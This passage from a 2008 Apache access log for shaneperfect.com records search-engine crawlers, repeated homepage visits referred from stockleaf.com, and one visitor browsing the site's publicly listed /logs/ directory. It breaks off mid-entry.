74.6.22.216 - - [21/Feb/2008:16:55:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.19.158 - - [21/Feb/2008:16:55:34 -0800] "GET /logs/access_070731.log HTTP/1.0" 200 89341 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.25.120 - - [21/Feb/2008:19:14:48 -0800] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
208.109.88.116 - - [21/Feb/2008:20:23:32 -0800] "GET / HTTP/1.0" 200 763 "-" "EmailSearch" "shaneperfect.com"
70.87.15.50 - - [21/Feb/2008:21:50:27 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/blogs/fat-pitch-financials.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
70.87.15.50 - - [21/Feb/2008:21:50:27 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/blogs/fat-pitch-financials.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
70.87.15.50 - - [21/Feb/2008:21:50:27 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/blogs/fat-pitch-financials.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
70.87.15.50 - - [21/Feb/2008:21:50:27 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/blogs/fat-pitch-financials.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
70.87.15.50 - - [21/Feb/2008:21:50:27 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/blogs/fat-pitch-financials.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
70.87.15.50 - - [21/Feb/2008:21:50:28 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/blogs/fat-pitch-financials.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
74.6.22.216 - - [21/Feb/2008:23:23:38 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.22.218 - - [21/Feb/2008:23:23:38 -0800] "GET /?S=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.19.114 - - [22/Feb/2008:00:47:38 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.20.216 - - [22/Feb/2008:00:47:39 -0800] "GET /logs/access_071101.log HTTP/1.0" 200 2087 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
75.125.165.10 - - [22/Feb/2008:01:23:36 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
75.125.165.10 - - [22/Feb/2008:01:23:36 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
75.125.165.10 - - [22/Feb/2008:01:23:36 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
75.125.165.10 - - [22/Feb/2008:01:23:36 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
75.125.165.10 - - [22/Feb/2008:01:23:36 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
75.125.165.10 - - [22/Feb/2008:01:23:36 -0800] "GET / HTTP/1.1" 200 779 "http://www.stockleaf.com/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.shaneperfect.com"
216.151.21.247 - - [22/Feb/2008:04:55:47 -0800] "GET /logs/access_070301.log HTTP/1.1" 200 25559 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLJ,GGLJ:2006-33,GGLJ:en&q=217%2e212%2e224%2e162" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "shaneperfect.com"
216.151.21.247 - - [22/Feb/2008:04:56:04 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "shaneperfect.com"
216.151.21.247 - - [22/Feb/2008:04:56:18 -0800] "GET / HTTP/1.1" 200 779 "http://shaneperfect.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "shaneperfect.com"
216.151.21.247 - - [22/Feb/2008:04:56:24 -0800] "GET /?M=A HTTP/1.1" 200 779 "http://shaneperfect.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "shaneperfect.com"
216.151.21.247 - - [22/Feb/2008:04:56:28 -0800] "GET /?N=A HTTP/1.1" 200 779 "http://shaneperfect.com/?M=A" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "shaneperfect.com"
216.151.21.247 - - [22/Feb/2008:04:56:31 -0800] "GET /logs/ HTTP/1.1" 200 3375 "http://shaneperfect.com/?N=A" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "shaneperfect.com"
74.6.19.114 - - [22/Feb/2008:13:42:12 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.29.32 - - [22/Feb/2008:13:42:13 -0800] "GET /logs/access_070330.log HTTP/1.0" 200 2550 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
38.99.13.121 - - [22/Feb/2008:16:14:44 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "shaneperfect.com"
63.123.238.8 - - [22/Feb/2008:22:30:55 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.shaneperfect.com"
63.123.238.8 - - [22/Feb/2008:22:30:55 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.shaneperfect.com"
66.231.189.152 - - [23/Feb/2008:00:35:55 -080